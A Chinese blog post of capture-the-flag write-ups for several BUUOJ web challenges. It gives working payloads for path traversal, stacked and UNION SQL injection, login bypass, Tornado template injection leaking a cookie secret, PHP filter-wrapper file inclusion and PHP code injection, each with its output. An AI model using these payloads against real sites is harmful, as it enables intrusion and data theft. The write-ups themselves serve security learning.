BUUOJ-Web题目-1

发布于 2020-09-21  101 次阅读


[HCTF 2018]WarmUp

开局一张图,看源码,提示source.php

那么我们直接看看~

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

源码里面有hint.php,看了flag not here, and flag in ffffllllaaaagggg

明白位置之后想办法绕过然后读取文件,于是

http://44a1c579-f956-49c8-a208-dda1ea28fe38.node3.buuoj.cn/source.php?file=source.php?/../../../../ffffllllaaaagggg

source.php当成一个目录,逐级向上访问,用?截断即可。

[强网杯 2019]随便注

随便写点内容,得到以下情况:

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

禁掉了select,但是对于MySQL,我们可以通过handler关键字来查询。也没有禁用showuse

同时也存在堆叠注入。

那么payload也就直截了当了。

先拿数据库名:

1';SHOW DATABASES;--+
http://61e566e2-f2ef-4e80-98ff-e90c3ce89536.node3.buuoj.cn/?inject=1%27%3BSHOW+DATABASES%3B--%2B

再利用堆叠找表名:

1';USE ctftraining;SHOW TABLES;--+
http://61e566e2-f2ef-4e80-98ff-e90c3ce89536.node3.buuoj.cn/?inject=1%27%3BUSE+ctftraining%3BSHOW+TABLES%3B--%2B

array(1) {
  [0]=>
  string(10) "FLAG_TABLE"
}

array(1) {
  [0]=>
  string(4) "news"
}

array(1) {
  [0]=>
  string(5) "users"
}

1';USE supersqli;SHOW TABLES;--+
http://61e566e2-f2ef-4e80-98ff-e90c3ce89536.node3.buuoj.cn/?inject=1%27%3BUSE+supersqli%3BSHOW+TABLES%3B--%2B

array(1) {
  [0]=>
  string(16) "1919810931114514"
}

array(1) {
  [0]=>
  string(5) "words"
}

然后我们来看看内容;

1';USE supersqli;HANDLER `1919810931114514` OPEN AS a;HANDLER a READ FIRST;HANDLER a CLOSE;--+
http://61e566e2-f2ef-4e80-98ff-e90c3ce89536.node3.buuoj.cn/?inject=1%27;USE%20supersqli;HANDLER%20`1919810931114514`%20OPEN%20AS%20a;HANDLER%20a%20READ%20FIRST;HANDLER%20a%20CLOSE;--+

array(1) {
  [0]=>
  string(42) "flag{b3c9350f-3de0-4576-a91e-352079c88d39}"
}

得到flag

顺便写个彩蛋:

1';USE ctftraining;HANDLER news OPEN AS a;HANDLER a READ FIRST;HANDLER a READ NEXT;HANDLER a READ NEXT;HANDLER a READ NEXT;HANDLER a CLOSE;--+
http://61e566e2-f2ef-4e80-98ff-e90c3ce89536.node3.buuoj.cn/?inject=1';USE ctftraining;HANDLER news OPEN AS a;HANDLER a READ FIRST;HANDLER a READ NEXT;HANDLER a READ NEXT;HANDLER a READ NEXT;HANDLER a CLOSE;--+

array(4) {
  [0]=>
  string(1) "1"
  [1]=>
  string(3) "dog"
  [2]=>
  string(282) "The domestic dog (Canis lupus familiaris when considered a subspecies of the wolf or Canis familiaris when considered a distinct species)[4] is a member of the genus Canis (canines), which forms part of the wolf-like canids,[5] and is the most widely abundant terrestrial carnivore."
  [3]=>
  string(10) "1571838684"
}

array(4) {
  [0]=>
  string(1) "2"
  [1]=>
  string(3) "cat"
  [2]=>
  string(241) "The cat or domestic cat (Felis catus) is a small carnivorous mammal.[1][2] It is the only domesticated species in the family Felidae.[4] The cat is either a house cat, kept as a pet, or a feral cat, freely ranging and avoiding human contact."
  [3]=>
  string(10) "1571838684"
}

array(4) {
  [0]=>
  string(1) "3"
  [1]=>
  string(4) "bird"
  [2]=>
  string(235) "Birds, also known as Aves, are a group of endothermic vertebrates, characterised by feathers, toothless beaked jaws, the laying of hard-shelled eggs, a high metabolic rate, a four-chambered heart, and a strong yet lightweight skeleton."
  [3]=>
  string(10) "1571838684"
}

array(4) {
  [0]=>
  string(1) "4"
  [1]=>
  string(4) "flag"
  [2]=>
  string(37) "Flag is in the database but not here."
  [3]=>
  string(10) "1571838684"
}

[SUCTF 2019]EasySQL

这题说是比赛时有源码,所以网上找来源码做做

所以这里存在两个payload;

第一个:

*,1

直接查全部

第二个:

1;set sql_mode=PIPES_AS_CONCAT;select 1

将MySQL的管道改成连接字符串,即可查到flag

[极客大挑战 2019]EasySQL

Payload

/check.php?username=1'OR'1'='1&password=1'OR'1'='1

直接万能密码就完事了,这样相当于拼接了前面和后面的引号,所以可以拿到flag。。。

[极客大挑战 2019]Havefun

一只猫;F12看看源码


        $cat=$_GET['cat'];
        echo $cat;
        if($cat=='dog'){
            echo 'Syc{cat_cat_cat_cat}';
        }

那我们操作一下:

http://4875f557-8a5e-4290-85cf-419fe3fe927d.node3.buuoj.cn/?cat=dog

拿到flag。。。

[护网杯 2018]easy_tornado

三个文件;

/flag.txt
flag in /fllllllllllllag

/welcome.txt
render

/hints.txt
md5(cookie_secret+md5(filename))

暗示我们要来一波文件读取

注意我们此时地址栏内大致是这样的:

http://00fb5853-9d87-4571-aa30-10f71787f268.node3.buuoj.cn/file?filename=/flag.txt&filehash=462ba60d88adff345e29fb730bb00dad

用人话说,就是构造一个filehash,但是我们不知道cookie_secret,可能这个是个挺长的东西

于是百度一波,发现了可以利用一个类似模板注入的方式操作

于是先来一波操作

http://00fb5853-9d87-4571-aa30-10f71787f268.node3.buuoj.cn/error?msg={{handler.settings}}

拿到cookie_secret

{'autoreload': True, 'compiled_template_cache': False, 'cookie_secret': 'bb610769-839d-4594-a36b-4522701241bb'} 

然后我们再算下md5

import hashlib

cv = 'bb610769-839d-4594-a36b-4522701241bb'

def md5(s):
    return hashlib.md5(s.encode('UTF-8')).hexdigest()

md5(cv + md5('/fllllllllllllag'))

访问得到flag

http://00fb5853-9d87-4571-aa30-10f71787f268.node3.buuoj.cn/file?filename=/fllllllllllllag&filehash=9b6438bb1920a3e20cc59e93c0224478

[极客大挑战 2019]Secret File

F12得到Archive_room.php

然后我们操作一波,发现需要用Burpsuite卡一下。那就卡一下,得到secr3t.php

得到源码

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

需要来一个文件包含之类的操作

PHP伪协议

http://cdc9247f-dae2-47bd-99f6-d34b5ceb40b0.node3.buuoj.cn/secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php

解码

<!DOCTYPE html>

<html>

    <head>
        <meta charset="utf-8">
        <title>FLAG</title>
    </head>

    <body style="background-color:black;"><br><br><br><br><br><br>

        <h1 style="font-family:verdana;color:red;text-align:center;">å•Šå“ˆï¼ä½ æ‰¾åˆ°æˆ‘äº†ï¼å¯æ˜¯ä½ çœ‹ä¸åˆ°æˆ‘QAQ~~~</h1><br><br><br>

        <p style="font-family:arial;color:red;font-size:20px;text-align:center;">
            <?php
                echo "我就在这里";
                $flag = 'flag{961d16f2-65b1-47d7-9ca5-13c46b17ae03}';
                $secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
            ?>
        </p>
    </body>

</html>

得到flag。

[ACTF2020 新生赛]Include

PHP伪协议读取源码。

Payload

http://eafba8d5-8d65-4aea-a535-21e1406b0db5.node3.buuoj.cn/?file=php://filter/convert.base64-encode/resource=flag.php

[极客大挑战 2019]LoveSQL

注入一下试试

http://12941d71-aa31-4e54-9151-a28205ddac5e.node3.buuoj.cn/check.php?username=flag&password=mi' UNION SELECT '1','2','3

可以正常回显

那么我们就随便再注入下

password=mi' UNION SELECT '1',group_concat('',table_name),'3' FROM information_schema.tables WHERE table_schema='geek' UNION SELECT 1,1,'2

得到列名

password=mi' UNION SELECT '1',group_concat('',column_name),'3' FROM information_schema.columns WHERE table_name='l0ve1ysq1' UNION SELECT 1,1,'2

得到行

password=mi' UNION SELECT '1',group_concat('',username),'3' FROM l0ve1ysq1 UNION SELECT 1,1,'2

得到内容

password=mi' UNION SELECT '1',group_concat('',password),'3' FROM l0ve1ysq1 WHERE username='flag' UNION SELECT 1,1,'2

[RoarCTF 2019]Easy Calc

一开始试图凑INF和NAN实现PHP注入……然而不行,没法执行

上网搜WP得知是前面加空格。。。

得到名字

calc.php? num=1;var_dump(scandir(chr(47)))

得到flag

calc.php? num=1;var_dump(file_get_contents(CHR(47).CHR(102).CHR(49).CHR(97).CHR(103).CHR(103)))
It is my final heart.
最后更新于 2022-07-24